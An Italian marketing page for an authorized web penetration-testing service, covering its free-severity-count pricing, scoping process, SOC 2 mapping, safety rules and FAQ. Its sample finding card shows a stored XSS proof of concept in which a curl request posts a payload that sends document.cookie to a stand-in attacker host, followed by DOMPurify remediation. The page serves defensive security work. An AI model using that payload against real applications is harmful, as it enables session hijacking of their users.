Accesso anticipato · Penetration testing

Pentest gratuito. Paghi solo per sbloccare il report.

Eseguiamo un penetration test autorizzato sulla tua applicazione web senza costi e condividiamo il conteggio per severità. Sblocca i findings completi (passi di riproduzione, punteggi CVSS, indicazioni di remediation ed evidenze SOC 2) a un prezzo fisso scritto nell'autorizzazione prima di iniziare.

Nessuna carta di credito Risposta in 24 ore con proposta Consegna in 7-14 giorni
Esempio di conteggio per severità: cosa arriva gratis
Critical 1
High 2
Medium 4
Low 6
Informational 3
Allineato a OWASP WSTG Evidenze SOC 2 Autorizzazione firmata Testing non-distruttivo Re-test incluso
Perché esiste

La maggior parte delle SaaS early-stage va in produzione con esposizioni critiche che nessuno sta testando.

Un pentest tradizionale costa tra 8.000 e 40.000 euro e richiede due mesi dall'inizio del procurement alla consegna. Così i founder lo rimandano oltre l'audit SOC 2, oltre la review di procurement enterprise, e a volte oltre il breach.

Abbiamo rimosso la barriera economica in entrata, così la conversazione può partire dai findings, non dalle fatture. Paghi solo quando c'è qualcosa per cui valga la pena pagare, e decidi se il report vale il prezzo dopo aver già visto il conteggio per severità.

8/10
delle web app SaaS early-stage che testiamo presenta almeno un finding critical o high al primo passaggio.
Come funziona

Quattro step. Da sette a quattordici giorni end to end.

Niente loop di procurement. Niente lista d'attesa trimestrale. Niente trattativa sulla tariffa giornaliera. Tutto l'inizio gira su un solo form e una sola call.

1

Raccontaci il tuo stack

Email di lavoro e URL dell'applicazione che vuoi testare. Tutto qui.

~30 secondi
2

Call di scoping

Quindici minuti per confermare asset in-scope, ruoli di autenticazione e sottosistemi out-of-scope. Prezzo di sblocco preventivato lo stesso giorno.

15 minuti
3

Autorizzazione firmata

Un documento breve definisce scope, rate limit, regole di testing non-distruttivo e il prezzo fisso di sblocco. Non iniziamo prima della controfirma.

Stessa settimana
4

Risultati consegnati

Il conteggio per severità arriva gratis. Sblocca il report completo per ricevere findings, CVSS, passi di riproduzione, indicazioni di remediation ed evidenze SOC 2.

7-14 giorni
Cosa ricevi

Conteggio per severità gratis. Sblocco a pagamento per il report completo.

Il tier gratuito esiste perché tu possa decidere in modo informato se passare al tier a pagamento. Se non troviamo nulla di critical, non devi nulla.

Step uno

Baseline gratuita

Nessun costo · Nessun obbligo
  • Numero di findings critical
  • Numero di findings high
  • Numero di findings medium
  • Executive summary di un paragrafo
  • Preavviso entro 24 ore se viene confermato un critical durante i test
Step due (opzionale)

Sblocco del report completo

Prezzo fisso · Definito prima dei test
  • Ogni finding con descrizione, evidenza e screenshot
  • Punteggio CVSS 3.1 e classificazione CWE
  • Ricetta di riproduzione così i tuoi ingegneri possono confermare la fix
  • Indicazioni di remediation con suggerimenti a livello di codice
  • Mapping ai controlli SOC 2 (CC4.1, CC7.1, CC7.4) per il tuo auditor
  • Un re-test gratuito dei findings risolti entro 60 giorni
  • Lettera di attestazione adatta a procurement e investor review
Come funziona il prezzo. Il prezzo di sblocco dipende da dimensione aziendale, settore e scope (sottodomini, ruoli autenticati, API). Viene scritto nel documento di autorizzazione prima dell'inizio dei test. Nessuna fattura a sorpresa.
Esempio di finding

Ecco come si presenta un singolo finding.

Ogni finding nel report a pagamento segue la stessa struttura: classificazione, evidenza, ricetta di riproduzione, blast radius e uno snippet di remediation che gli ingegneri possono rilasciare senza una call di follow-up.

La card a destra è illustrativa. Scarica qui sotto un esempio sanitizzato di sei pagine del report completo.

Scarica il report di esempio (PDF)

SP-001 · Dettaglio finding
Critical CVSS 9.0 CWE-79
Stored XSS nel renderer dei commenti
POST /api/v1/comments · rendered at /app/threads/{id}
Proof of concept
curl -X POST https://app.example.com/api/v1/comments \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"body":"<img src=x onerror=fetch(\"https://attacker.tld/?c=\"+document.cookie)>"}'
Perché conta
Il payload viene renderizzato senza sanitization in ogni vista della lista commenti. Qualunque utente autenticato con permesso di scrittura può virare verso il furto di sessione per ogni viewer del thread, inclusi gli admin.
Remediation
// Sanitize on render, not on write.
import DOMPurify from "dompurify";
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(comment.body) }} />
Evidenze pronte per l'audit

Mappato sui controlli SOC 2 e OWASP WSTG.

Gli auditor vogliono evidenze, non screenshot. Il report a pagamento collega ogni finding ai criteri SOC 2 toccati e la nostra coverage di testing è mappata sulla OWASP Web Security Testing Guide, così puoi dimostrare uno scope completo, non un sampling selettivo.

Controllo SOC 2Cosa testiamoSezione OWASP WSTG
CC4.1 MonitoringCoverage di detection su injection, broken auth e percorsi di privilege escalationWSTG-INPV, WSTG-ATHN, WSTG-ATHZ
CC7.1 System operationsCompletezza dei log e resistenza alla manomissione sotto attività di attaccoWSTG-ERRH, WSTG-CRYP
CC7.4 Incident responseVerifica che gli alert scattino sui pattern di attacco che il tuo runbook dichiara di coprireWSTG-CONF, WSTG-IDNT

Dopo la remediation, ri-testiamo gli stessi controlli ed emettiamo un'attestazione di follow-up. Il re-test è incluso nel prezzo di sblocco per 60 giorni.

Sicurezza e aspetti legali

Come evitiamo che il test diventi l'incidente.

Il penetration testing autorizzato è una prassi definita da oltre vent'anni. Non facciamo nulla senza il tuo permesso firmato, e una volta ottenuto seguiamo regole operative rigorose così il test non diventa mai l'incidente.

Verifica di proprietà del dominio

Confermiamo che controlli l'asset tramite record DNS TXT o lettera firmata su carta intestata aziendale. Nessuna eccezione, neanche con clienti già noti.

Tetto al rate limit

Le probe automatizzate sono limitate a 10 richieste al secondo per host. L'exploitation manuale procede a velocità umana. Il tuo monitoring vedrà traffico, non pressione.

Testing non-distruttivo

Non cancelliamo, modifichiamo o esfiltriamo dati di produzione. La proof-of-concept viene catturata alla profondità minima necessaria a confermare la vulnerabilità.

Cifratura in transito e a riposo

Findings, prove e screenshot sono cifrati end to end. L'accesso è limitato al lead tester e a un solo reviewer.

Conservazione dei dati

I report vengono conservati per 90 giorni per supportare il re-test incluso, poi cancellati su richiesta. Non condividiamo mai i findings con nessuno al di fuori del progetto.

Rispetto dell'out-of-scope

Tutto ciò che è dichiarato out-of-scope nell'autorizzazione viene trattato come production-critical. Se un finding lo attraversa, ci fermiamo e ci consultiamo prima di proseguire.

Add-on opzionale

OSINT: cosa internet già sa del tuo team.

Il pentest copre la tua applicazione. L'add-on OSINT copre il perimetro che non puoi patchare: credenziali trapelate nei dump pubblici, bucket S3 esposti e indicizzati dai motori di ricerca, repository GitHub con token hardcoded e l'impronta LinkedIn che rende banale il phishing mirato.

Quotato come engagement separato. La maggior parte dei team lo aggiunge al secondo ciclo, dopo aver risolto i findings dell'applicazione.

L'OSINT scan copre

  • Credential dump e dataset di breach
  • Repository di codice pubblici
  • Indici di cloud storage e leak di metadati
  • Mappatura della superficie di social engineering
  • Monitoraggio di typo-squat e domini lookalike
Richiedi

Fai il tuo scoping questa settimana.

Inserisci la tua email di lavoro e l'URL dell'applicazione che vuoi testare. Rispondiamo entro 24 ore con uno scope proposto, il prezzo di sblocco e uno slot di call da 15 minuti.

  • Risposta entro 24 ore con il prezzo esatto di sblocco.
  • Quotiamo direttamente. Nessun passaggio commerciale.
  • Vedi il conteggio per severità prima di decidere se sbloccare.
  • La pagina non mostra mai un cartellino del prezzo perché ogni progetto viene scopato.

Richiedi un pentest gratuito

Due campi. Al resto pensiamo noi.

Nessuna carta di credito. No commitment. You'll receive the proposal and the exact unlock price within 24 hours.

FAQ

Le domande che riceviamo ogni settimana.

Quanto dura il progetto? +
La maggior parte dei progetti dura da 7 a 14 giorni dall'autorizzazione alla consegna. La call di scoping di 15 minuti avviene tipicamente entro 24 ore dalla richiesta e l'autorizzazione viene firmata la stessa settimana.
Cosa succede se non trovate nulla di grave? +
Ricevi comunque il conteggio per severità gratuito e un breve sommario. Non sei obbligato a sbloccare il report completo se non emerge nulla di critical o high. Una baseline pulita è di per sé un artefatto utile per investitori e team di procurement.
Cosa succede se trovate qualcosa di sfruttabile? +
Ricevi una notifica entro 24 ore dalla conferma, prima della consegna, così il tuo team può iniziare la remediation immediatamente. Il report completo include una ricetta di riproduzione, una valutazione del blast radius e un suggerimento di patch per ogni finding.
Come viene stabilito il prezzo di sblocco? +
Il prezzo dipende da dimensione aziendale, settore e scope (numero di sottodomini, ruoli autenticati, API). Viene scritto nel documento di autorizzazione prima dell'inizio dei test. Non riceverai mai una fattura a sorpresa.
È legale? +
Sì. Il penetration testing con autorizzazione firmata è una prassi standard da oltre vent'anni. Il documento di autorizzazione concede il permesso esplicito, definisce lo scope (asset in-scope e out-of-scope), imposta un tetto al rate limit e conferma le regole di testing non-distruttivo. Senza quel documento non si esegue alcun test.
Per quanto tempo conservate i miei dati? +
Findings e prove sono cifrati in transito e a riposo, conservati per 90 giorni per il re-test e le evidenze SOC 2, poi cancellati su richiesta. Non esfiltriamo dati dei clienti; le prove sono ridotte al minimo necessario per confermare la vulnerabilità.

Scopri cosa troverebbe un attaccante prima di te.

Baseline gratuita. Sblocco a pagamento solo se c'è qualcosa per cui valga la pena pagare. Scoping questa settimana.

Richiedi un pentest gratuito
Nessuna carta di credito · Nessun loop di procurement · Risposta in 24 ore con il prezzo esatto di sblocco
Richiedi un pentest gratuito